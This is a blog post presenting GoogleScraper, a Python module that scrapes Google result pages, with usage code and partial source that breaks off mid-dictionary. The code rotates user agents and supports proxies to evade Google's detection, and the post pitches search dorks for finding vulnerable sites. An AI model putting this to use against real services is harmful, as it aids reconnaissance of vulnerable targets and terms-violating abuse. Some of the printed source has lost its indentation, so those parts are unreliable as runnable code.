<p>Please note that this is by no means a final version! Heavy
structural changes will be implemented in the near future (I'll
experiment with asynchronous networking, for instance). But on this site,
I will always host a working version with instructions on how to use it,
so that visitors can always use the script!</p>
<p><strong>1. Edit (07.01.2013):</strong></p>
<ul>
<li>Using requests instead of urllib</li>
<li>Added random User Agents for every new search.</li>
<li>Cleaned the code</li>
<li>Implemented foundation to combine with proxychains</li>
</ul>
<h3>Original Blog Post</h3>
<p>Sample output after searching for 'cats are not cute' (sorry) with 100
results per page on 3 ascending pages:
<a href="https://incolumitas.com/uploads/2013/01/out.txt">results.txt</a></p>
<p>I have always been in need of a fast and reliable Python module to
query the Google search engine. The Google API is rubbish, because it
gives you at most 36 results. This is completely unacceptable!</p>
<p>So, I looked further and found <a href="http://code.google.com/p/pygoogle/">http://code.google.com/p/pygoogle/</a>,
which is not what we want. They say:</p>
<blockquote>
<p><em>pygoogle is a </em><em>very basic</em><em> Google search module for Python. It has
a limitation of only 64 results. If you want more results, see
xgoogle.</em></p>
</blockquote>
<p>Le optimistic me goes to the homepage of
<a href="http://www.catonmat.net/blog/python-library-for-google-search/">xgoogle</a>,
just to be disappointed again. The module seems broken, imports some
outdated libraries and is generally very, very large. The author probably
did a nice job, but I immediately realized that I had to implement my
own. This was unacceptable, since my Python programming knowledge and
coding style really lack any depth and profundity.</p>
<p><strong>The module should basically satisfy two purposes:</strong></p>
<ul>
<li>Parse an arbitrary number of pages with the maximum number of search
results per page.</li>
<li>Clean the found URLs from badboys like 'gstatic.com' or 'google.com'</li>
</ul>
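<p>The second purpose, cleaning the found URLs, could be sketched roughly as below. This is only an illustration and not the code GoogleScraper actually uses: the names <code>BLOCKED_DOMAINS</code>, <code>is_blocked</code> and <code>clean_urls</code> are made up for this example, and the blocklist contains just the two hosts mentioned above.</p>

```python
from urllib.parse import urlparse

# Hypothetical blocklist: only the two hosts named in the post.
BLOCKED_DOMAINS = ("gstatic.com", "google.com")


def is_blocked(url, blocked=BLOCKED_DOMAINS):
    """Return True if the URL's host is a blocked domain or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == domain or host.endswith("." + domain) for domain in blocked)


def clean_urls(urls, blocked=BLOCKED_DOMAINS):
    """Keep only the URLs whose host is not on the blocklist, preserving order."""
    return [url for url in urls if not is_blocked(url, blocked)]


if __name__ == "__main__":
    found = [
        "http://www.python.org/about/",
        "https://ssl.gstatic.com/ui/v1/icons/x.png",
        "https://www.google.com/preferences",
        "http://notgoogle.com.example.org/",
    ]
    for url in clean_urls(found):
        print(url)
```

<p>Comparing the parsed host name (instead of searching the whole URL for a substring) avoids throwing away unrelated sites that merely contain 'google.com' somewhere in their address.</p>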
<p><strong>What can you use the module for?</strong></p>
<ul>
<li>Statistics</li>
<li>Find vulnerable applications</li>
<li>Scanning lots of sites with dorks (the intext, inurl and site
parameters are usable in the query!)</li>
</ul>
<p><strong>To-do list (06.01.2013):</strong></p>
<ul>
<li>Clean the code. Treat all errors correctly and make the script more
robust.</li>
<li>Add functionality, like a parallel yahoo and bing search to compare
the search results to gain maximal knowledge!</li>
<li>Provide better configuration freedom. There are a lot of google
search parameters :/</li>
<li>Maybe: Port to Python 2.7</li>
</ul>
<h3>Usage</h3>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">GoogleScraper</span>
<span class="kn">import</span> <span class="nn">urllib.parse</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">results</span> <span class="o">=</span> <span class="n">GoogleScraper</span><span class="o">.</span><span class="n">scrape</span><span class="p">(</span><span class="s1">'Best SEO tool'</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">num_pages</span><span class="o">=</span><span class="mi">3</span><span class="p">,</span> <span class="n">offset</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">page</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">link_title</span><span class="p">,</span> <span class="n">link_snippet</span><span class="p">,</span> <span class="n">link_url</span> <span class="ow">in</span> <span class="n">page</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]:</span>
            <span class="c1"># You can access all parts of the search results like that</span>
            <span class="c1"># link_url.scheme => URL scheme specifier (Ex: 'http')</span>
            <span class="c1"># link_url.netloc => Network location part (Ex: 'www.python.org')</span>
            <span class="c1"># link_url.path => Hierarchical path (Ex: '/help/Python.html')</span>
            <span class="c1"># link_url.params => Parameters for last path element</span>
            <span class="c1"># link_url.query => Query component</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="nb">print</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">unquote</span><span class="p">(</span><span class="n">link_url</span><span class="o">.</span><span class="n">geturl</span><span class="p">()))</span> <span class="c1"># This reassembles the parts of the url to the whole thing</span>
            <span class="k">except</span> <span class="ne">Exception</span><span class="p">:</span>
                <span class="k">pass</span>
    <span class="c1"># How many urls did we get on all pages?</span>
    <span class="nb">print</span><span class="p">(</span><span class="nb">sum</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">page</span><span class="p">[</span><span class="s1">'results'</span><span class="p">])</span> <span class="k">for</span> <span class="n">page</span> <span class="ow">in</span> <span class="n">results</span><span class="p">))</span>
    <span class="c1"># How many hits has google found with our keyword (as shown on the first page)?</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">results</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="s1">'num_results_for_kw'</span><span class="p">])</span>
</code></pre></div>
<p><strong>[Warning: This description is deprecated, the sources are fresh
though]</strong></p>
<p>How it works: Basically, you create a GoogleScraper object with the
query to search for. You also specify the number of results per page
(10, 25, 50 or 100) you want to obtain. Then you call the method search()
on the newly created object with a parameter indicating the number of pages
to search. I didn't test how many pages I can scrape ^^ It's up to
you to tell me!</p>
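<p>To make the relation between "results per page" and "number of pages" a bit more concrete, here is a minimal sketch of how one request URL per page could be derived. It is not taken from the module: <code>build_page_urls</code> is a hypothetical helper, treating <code>offset</code> as a result offset is an assumption, and it relies on Google's <code>q</code>, <code>num</code> and <code>start</code> query parameters.</p>

```python
from urllib.parse import urlencode

# Page sizes mentioned in the description above.
ALLOWED_RESULTS_PER_PAGE = (10, 25, 50, 100)


def build_page_urls(query, num_results_per_page=10, num_pages=1, offset=0):
    """Return one search URL per requested page (hypothetical helper).

    'start' is the index of the first result on a page, so page n begins at
    offset + n * num_results_per_page.
    """
    if num_results_per_page not in ALLOWED_RESULTS_PER_PAGE:
        raise ValueError("num_results_per_page must be one of %r"
                         % (ALLOWED_RESULTS_PER_PAGE,))
    urls = []
    for page in range(num_pages):
        params = {
            "q": query,
            "num": num_results_per_page,
            "start": offset + page * num_results_per_page,
        }
        urls.append("https://www.google.com/search?" + urlencode(params))
    return urls


if __name__ == "__main__":
    for url in build_page_urls("Best SEO tool", num_results_per_page=50, num_pages=3):
        print(url)
```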
<p>The GoogleScraper.search() method returns a list of special tuples!
Each of these tuples represents a URL. If you want to know more about
this special tuple, please read the Python
<a href="http://docs.python.org/3.2/library/urllib.parse.html#url-parsing">documentation</a>.</p>
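<p>A short illustration of such a tuple, using only the standard library. The example URL is made up; the result of <code>urllib.parse.urlparse()</code> is a named tuple with six fields that can be read by name, unpacked like any tuple, and glued back together with <code>geturl()</code>.</p>

```python
from urllib.parse import urlparse, unquote

# Made-up URL, just to have something to take apart.
link_url = urlparse("http://www.python.org/help/Python.html;v=1?q=a%20b#top")

# Access by attribute name ...
print(link_url.scheme)    # 'http'
print(link_url.netloc)    # 'www.python.org'
print(link_url.path)      # '/help/Python.html'
print(link_url.params)    # 'v=1'
print(link_url.query)     # 'q=a%20b'
print(link_url.fragment)  # 'top'

# ... or unpack it like an ordinary 6-tuple.
scheme, netloc, path, params, query, fragment = link_url

# geturl() reassembles the parts; unquote() decodes the percent-escapes.
print(unquote(link_url.geturl()))
```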
<p>The module is here:</p>
<table class="highlighttable"><tr><td class="code"><div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="sd">"""</span>
<span class="sd">Complete rewrite.</span>
<span class="sd">Many thanks go to v3nz3n</span>
<span class="sd">This is a little module that uses Google to automate search</span>
<span class="sd">queries. It gives straightforward access to all relevant data of Google such as</span>
<span class="sd">- The links of the result page</span>
<span class="sd">- The title of the links</span>
<span class="sd">- The caption/description below each link</span>
<span class="sd">- The number of results for this keyword</span>
<span class="sd">GoogleScraper's architecture outlined:</span>
<span class="sd">- Proxy support (Socks5, Socks4, HTTP Proxy)</span>
<span class="sd">- Threading support</span>
<span class="sd">The module implements some countermeasures to circumvent spamming detection</span>
<span class="sd">from the Google Servers:</span>
<span class="sd">{List them here}</span>
<span class="sd">Note: Scraping violates the Google Terms of Service (TOS).</span>
<span class="sd">"""</span>
<span class="n">__VERSION__</span> <span class="o">=</span> <span class="s1">'0.4'</span>
<span class="n">__UPDATED__</span> <span class="o">=</span> <span class="s1">'17.02.2014'</span> <span class="c1"># day.month.year</span>
<span class="n">__AUTHOR__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__WEBSITE__</span> <span class="o">=</span> <span class="s1">'incolumitas.com'</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">logging</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">namedtuple</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">urllib.parse</span>
<span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">choice</span>
<span class="k">try</span><span class="p">:</span>
    <span class="kn">import</span> <span class="nn">requests</span>
    <span class="kn">from</span> <span class="nn">cssselect</span> <span class="kn">import</span> <span class="n">HTMLTranslator</span><span class="p">,</span> <span class="n">SelectorError</span>
    <span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">UnicodeDammit</span>
    <span class="kn">import</span> <span class="nn">socks</span> <span class="c1"># should be in the same directory</span>
<span class="k">except</span> <span class="ne">ImportError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">e</span><span class="o">.</span><span class="n">msg</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'You can install missing modules with `pip install [modulename]`'</span><span class="p">)</span>
    <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># module wide global variables and configuration</span>
<span class="c1"># First obtain a logger</span>
<span class="n">logger</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">getLogger</span><span class="p">(</span><span class="s1">'GoogleScraper'</span><span class="p">)</span>
<span class="n">logger</span><span class="o">.</span><span class="n">setLevel</span><span class="p">(</span><span class="n">logging</span><span class="o">.</span><span class="n">INFO</span><span class="p">)</span>
<span class="n">ch</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">StreamHandler</span><span class="p">(</span><span class="n">stream</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="n">ch</span><span class="o">.</span><span class="n">setLevel</span><span class="p">(</span><span class="n">logging</span><span class="o">.</span><span class="n">INFO</span><span class="p">)</span>
<span class="n">formatter</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">Formatter</span><span class="p">(</span><span class="s1">'</span><span class="si">%(asctime)s</span><span class="s1"> - </span><span class="si">%(name)s</span><span class="s1"> - </span><span class="si">%(levelname)s</span><span class="s1"> - </span><span class="si">%(message)s</span><span class="s1">'</span><span class="p">)</span>
<span class="n">ch</span><span class="o">.</span><span class="n">setFormatter</span><span class="p">(</span><span class="n">formatter</span><span class="p">)</span>
<span class="n">logger</span><span class="o">.</span><span class="n">addHandler</span><span class="p">(</span><span class="n">ch</span><span class="p">)</span>
<span class="c1"># Whether caching shall be enabled</span>
<span class="n">DO_CACHING</span> <span class="o">=</span> <span class="kc">True</span>
<span class="c1"># The directory path for cached google results</span>
<span class="n">CACHEDIR</span> <span class="o">=</span> <span class="s1">'.scrapecache/'</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">):</span>
        <span class="n">os</span><span class="o">.</span><span class="n">mkdir</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="mo">0o744</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">GoogleSearchError</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">pass</span>
    <span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="s1">'Exception in GoogleSearch class'</span>
<span class="k">class</span> <span class="nc">InvalidNumberResultsException</span><span class="p">(</span><span class="n">GoogleSearchError</span><span class="p">):</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">number_of_results</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">nres</span> <span class="o">=</span> <span class="n">number_of_results</span>
    <span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="s1">'</span><span class="si">{}</span><span class="s1"> is not a valid number of results per page'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">nres</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">maybe_clean_cache</span><span class="p">():</span>
    <span class="sd">"""Delete all .cache files in the cache directory that are older than 12 hours."""</span>
    <span class="k">for</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span> <span class="o">></span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">))</span> <span class="o">+</span> <span class="p">(</span><span class="mi">60</span> <span class="o">*</span> <span class="mi">60</span> <span class="o">*</span> <span class="mi">12</span><span class="p">):</span>
            <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">))</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
    <span class="c1"># Clean the CACHEDIR once in a while</span>
    <span class="n">maybe_clean_cache</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">cached_file_name</span><span class="p">(</span><span class="n">search_params</span><span class="p">):</span>
    <span class="n">sha</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha256</span><span class="p">()</span>
    <span class="c1"># Make a unique file name based on the values of the google search parameters.</span>
    <span class="n">sha</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="sa">b</span><span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">search_params</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">s</span><span class="p">))</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">search_params</span><span class="o">.</span><span class="n">keys</span><span class="p">())))</span>
    <span class="k">return</span> <span class="s1">'</span><span class="si">{}</span><span class="s1">.</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sha</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="s1">'cache'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">get_cached</span><span class="p">(</span><span class="n">search_params</span><span class="p">):</span>
    <span class="sd">"""Loads a cached search results page from scrapecache/fname.cache</span>
<span class="sd">    It helps in testing and avoids requesting</span>
<span class="sd">    the same resources again and again (such that google may</span>
<span class="sd">    recognize us as what we are: Sneaky SEO crawlers!)</span>
<span class="sd">    """</span>
    <span class="n">fname</span> <span class="o">=</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="n">search_params</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">):</span>
            <span class="c1"># If the cached file is older than 12 hours, return False and thus</span>
            <span class="c1"># make a new fresh request.</span>
            <span class="n">modtime</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">))</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">modtime</span><span class="p">)</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">></span> <span class="mi">12</span><span class="p">:</span>
                <span class="k">return</span> <span class="kc">False</span>
            <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">),</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
                <span class="k">return</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">except</span> <span class="ne">FileNotFoundError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
        <span class="c1"># FileNotFoundError has no .msg attribute, so format the exception itself</span>
        <span class="k">raise</span> <span class="ne">Exception</span><span class="p">(</span><span class="s1">'Unexpected file not found: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
    <span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">cache_results</span><span class="p">(</span><span class="n">search_params</span><span class="p">,</span> <span class="n">html</span><span class="p">):</span>
    <span class="sd">"""Stores a html resource as a file in scrapecache/fname.cache</span>
<span class="sd">    This will always write(overwrite) the cache file.</span>
<span class="sd">    """</span>
    <span class="n">fname</span> <span class="o">=</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="n">search_params</span><span class="p">)</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">),</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
        <span class="n">fd</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">GoogleScrape</span><span class="p">(</span><span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">):</span>
<span class="sd">"""Offers a fast way to query the google search engine.</span>
<span class="sd"> Overrides the run() method of the superclass threading.Thread.</span>
<span class="sd"> Each thread represents a crawl for one Google Results Page.</span>
<span class="sd"> http://www.blueglass.com/blog/google-search-url-parameters-query-string-anatomy/</span>
<span class="sd"> """</span>
<span class="c1"># Valid URL (taken from django)</span>
<span class="n">_REGEX_VALID_URL</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span>
<span class="sa">r</span><span class="s1">'^(?:http|ftp)s?://'</span> <span class="c1"># http:// or https://</span>
<span class="sa">r</span><span class="s1">'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'</span> <span class="c1"># domain...</span>
<span class="sa">r</span><span class="s1">'localhost|'</span> <span class="c1"># localhost...</span>
<span class="sa">r</span><span class="s1">'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'</span> <span class="c1"># ...or ip</span>
<span class="sa">r</span><span class="s1">'(?::\d+)?'</span> <span class="c1"># optional port</span>
<span class="sa">r</span><span class="s1">'(?:/?|[/?]\S+)$'</span><span class="p">,</span> <span class="n">re</span><span class="o">.</span><span class="n">IGNORECASE</span><span class="p">)</span>
<span class="n">_REGEX_VALID_URL_SIMPLE</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span>
<span class="sa">r</span><span class="s1">'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'</span><span class="p">)</span>
<span class="c1"># Named tuple type for the search results</span>
<span class="n">Result</span> <span class="o">=</span> <span class="n">namedtuple</span><span class="p">(</span><span class="s1">'LinkResult'</span><span class="p">,</span> <span class="s1">'link_title link_snippet link_url'</span><span class="p">)</span>
<span class="c1"># Several different User-Agents to diversify the requests.</span>
<span class="c1"># Keep the User-Agents updated. Last update: 17 February 2014</span>
<span class="c1"># Get them here: http://techblog.willshouse.com/2012/01/03/most-common-user-agents/</span>
<span class="n">_UAS</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36'</span>
<span class="p">]</span>
<span class="n">_HEADERS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'User-Agent'</span><span class="p">:</span> <span class="s1">'Mozilla/5.0'</span><span class="p">,</span>
<span class="s1">'Accept'</span><span class="p">:</span> <span class="s1">'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'</span><span class="p">,</span>
<span class="s1">'Accept-Encoding'</span><span class="p">:</span> <span class="s1">'gzip, deflate'</span><span class="p">,</span>
<span class="s1">'Connection'</span><span class="p">:</span> <span class="s1">'close'</span><span class="p">,</span>
<span class="s1">'DNT'</span><span class="p">:</span> <span class="s1">'1'</span>
<span class="p">}</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">search_query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="o">=</span><span class="mi">10</span><span class="p">,</span> <span class="n">num_page</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">search_params</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="sd">"""Initialises an object responsible for scraping one particular results page.</span>
<span class="sd"> @param search_query: The query to scrape for.</span>
<span class="sd"> @param num_results_per_page: The number of results per page. Must not exceed 1000.</span>
<span class="sd"> (In my tests, however, at most 100 results were returned per page.)</span>
<span class="sd"> @param num_page: The number/index of the page.</span>
<span class="sd"> @param search_params: A dictionary with additional search params. The default search params are updated with this dictionary.</span>
<span class="sd"> """</span>
<span class="nb">super</span><span class="p">()</span><span class="o">.</span><span class="fm">__init__</span><span class="p">()</span>
<span class="n">logger</span><span class="o">.</span><span class="n">debug</span><span class="p">(</span><span class="s2">"Created new GoogleScrape object with params: query=</span><span class="si">{}</span><span class="s2">, num_results_per_page=</span><span class="si">{}</span><span class="s2">, num_page=</span><span class="si">{}</span><span class="s2">"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span>
<span class="n">search_query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="p">,</span> <span class="n">num_page</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_query</span> <span class="o">=</span> <span class="n">search_query</span>
<span class="k">if</span> <span class="n">num_results_per_page</span> <span class="ow">not</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1001</span><span class="p">):</span> <span class="c1"># The maximum value of this parameter is 1000. See search appliance docs</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'The parameter -n must be smaller than or equal to 1000'</span><span class="p">)</span>
<span class="k">raise</span> <span class="n">InvalidNumberResultsException</span><span class="p">(</span><span class="n">num_results_per_page</span><span class="p">)</span>
<span class="k">if</span> <span class="n">num_page</span><span class="o">*</span><span class="n">num_results_per_page</span> <span class="o">+</span> <span class="n">num_results_per_page</span> <span class="o">></span> <span class="mi">1000</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'The maximal number of results for a query is 1000'</span><span class="p">)</span>
<span class="k">raise</span> <span class="n">InvalidNumberResultsException</span><span class="p">(</span><span class="n">num_page</span><span class="o">*</span><span class="n">num_results_per_page</span> <span class="o">+</span> <span class="n">num_results_per_page</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">num_results_per_page</span> <span class="o">=</span> <span class="n">num_results_per_page</span>
<span class="bp">self</span><span class="o">.</span><span class="n">num_page</span> <span class="o">=</span> <span class="n">num_page</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_URL</span> <span class="o">=</span> <span class="s1">'http://www.google.com/search'</span>
<span class="c1"># http://www.rankpanel.com/blog/google-search-parameters/</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'q'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># the search query string</span>
<span class="s1">'num'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># the number of results per page</span>
<span class="s1">'numgm'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Number of KeyMatch results to return with the results. A value between 0 to 50 can be specified for this option.</span>
<span class="s1">'start'</span><span class="p">:</span> <span class="s1">'0'</span><span class="p">,</span> <span class="c1"># Specifies the index number of the first entry in the result set that is to be returned. page number = (start / num) + 1</span>
<span class="c1"># The maximum number of results available for a query is 1,000, i.e., the value of the start parameter added to the value of the num parameter cannot exceed 1,000.</span>
